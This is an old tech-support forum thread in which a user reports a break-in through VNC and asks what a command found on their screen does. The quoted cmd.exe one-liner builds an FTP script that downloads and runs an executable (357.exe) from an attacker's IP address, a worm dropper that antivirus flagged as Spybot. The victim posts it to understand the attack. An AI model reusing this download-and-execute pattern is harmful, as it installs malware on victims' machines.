Solved

I got hacked. Found this command,

Posted on 2006-11-09
1
279 Views
Last Modified: 2010-03-05
I was trouble shooting a time out issue with my internet connection.  During this process I disconnected my switch, then I took my router of the mix.  At this point , my PC was connected directly to my DSL modem.  After 15 minutes past I walked away from my pc for 2 minutes.  I came back to find my VNC icon Black, which means someon was connected, and my Symantec Auto Protect box up on the screen.  I immediatly closed the VNC session.  I then went to run a netstat to see if someone was connected and noticed this string in the command window.

cmd.exe /c del i&echo open 66.16.176.238 12680 > i&echo user 1 1 >> i &echo get 357.exe >> i &echo quit >> i &ftp -n -s:i &357.exe&del i&exit

That same IP address was the ip address that connected to my computer via VNC.  I found it on the event viewer.
I then checked the symantec log and it shows that it blocked the w32.spybot.worm.  Here is what I am guessing.
This bunghole connected to my machine, someone how got into my VNC, and attempted to download a virus, but Norton caught it.

Can anyone tell me for sure what the above command does?
0
Comment
Question by:steveLaMi
1 Comment
 
LVL 47

Accepted Solution

by:
rpggamergirl earned 500 total points
ID: 17910951
There are 2 or 3 questions already with similar issues and theirs were caused by the RealVNC bug of some version.

Here's one of the question I found:
http://www.experts-exchange.com/Operating_Systems/WinXP/Q_22051676.html#17903231
0

Featured Post

Save on storage to protect fatherhood memories

You're the dad who has everything. This Father's Day, make sure your family memories are protected. My Passport Ultra has automatic backup and password protection to keep your cherished photos and videos safe. With up to 3TB, you have plenty of room to hold the adventures ahead.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Three simple tips to quickly and efficiently back up and protect the contents of your PC and Mac®.
The new Gmail Phishing Scam going around is surprising even the savviest of users with its sophisticated techniques. This attack comes as a nightmare trifecta for email filtering services; sent from a familiar contact, using authentic tone and verbi…
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, just open a new email message. In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…

861 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

30 Experts available now in Live!

Get 1:1 Help Now